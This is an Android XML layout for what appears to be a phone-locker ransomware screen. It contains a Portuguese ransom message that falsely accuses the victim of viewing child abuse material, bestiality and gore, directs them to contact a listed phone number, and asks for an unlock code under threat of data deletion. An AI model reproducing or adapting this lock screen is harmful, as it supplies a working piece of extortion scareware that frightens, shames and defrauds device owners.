<LinearLayout
	xmlns:android="http://schemas.android.com/apk/res/android"
	xmlns:app="http://schemas.android.com/apk/res-auto"
	xmlns:tools="http://schemas.android.com/tools"
	android:layout_width="match_parent"
	android:layout_height="match_parent"
	android:orientation="vertical">
	<LinearLayout
		android:id="@+id/linear1"
		android:layout_width="match_parent"
		android:layout_height="match_parent"
		android:padding="8dp"
		android:background="@drawable/brazill_2"
		android:orientation="vertical">
		<LinearLayout
			android:id="@+id/linear2"
			android:layout_width="match_parent"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:background="@drawable/brazill_2"
			android:orientation="horizontal" />
		<ScrollView
			android:id="@+id/vscroll1"
			android:layout_width="match_parent"
			android:layout_height="180dp"
			android:padding="8dp"
			android:background="@drawable/brazil">
			<TextView
				android:id="@+id/textview1"
				android:layout_width="wrap_content"
				android:layout_height="wrap_content"
				android:padding="8dp"
				android:text="SEU TELEFONE ESTÁ BLOQUEADO RAZÃO PARA VER E SER ENGANADOR PORNOGRAFIA DE CRIANÇAS ZOOF** E PEDO**. P*RNOGRAFIA MATANDO \nSER FRAUDE PESSOAS NO SITE gorecenter.com E TAL E TAL MATANDO PESSOAS COM ARMAS MATANDO PESSOAS MATANDO ANIMAIS \nE SER ENGANADOR COMO DESBLOQUEAR MEU TELEFONE\? 1 ENCONTRE EM OUTRO DISPOSITIVO ENCONTRE O NÚMERO +380991206337 E 2 ESCREVA UMA MENSAGEM NÃO VOU MAIS VER P*RNOGRAFIA ZOOF*LY PEDOPHILIUM CRIANÇA P*RNOGRAFIA \nE NÃO SEJA UM ENGANADOR\nMATANDO PESSOAS MATANDO ANIMAIS VEJA O SITE gorecenter.com E ASSASSINATO E ASSASSINATO COM ARMAS POR FAVOR DÊ A SENHA PARA SAIR DO VÍRUS E DADOS SEM MOTIVOS REMOVIDOS!"
				android:textSize="20sp"
				android:textColor="#000000" />
		</ScrollView>
		<EditText
			android:id="@+id/editText1"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:textSize="18sp"
			android:textColor="#000000"
			android:hint="POR FAVOR DIGITE O CÓDIGO"
			android:textColorHint="#000000" />
		<Button
			android:id="@+id/button1"
			android:layout_width="match_parent"
			android:layout_height="90dp"
			android:padding="8dp"
			android:background="@drawable/brazil"
			android:text="SAÍDA"
			android:textSize="50sp"
			android:textColor="#000000" />
	</LinearLayout>
</LinearLayout>
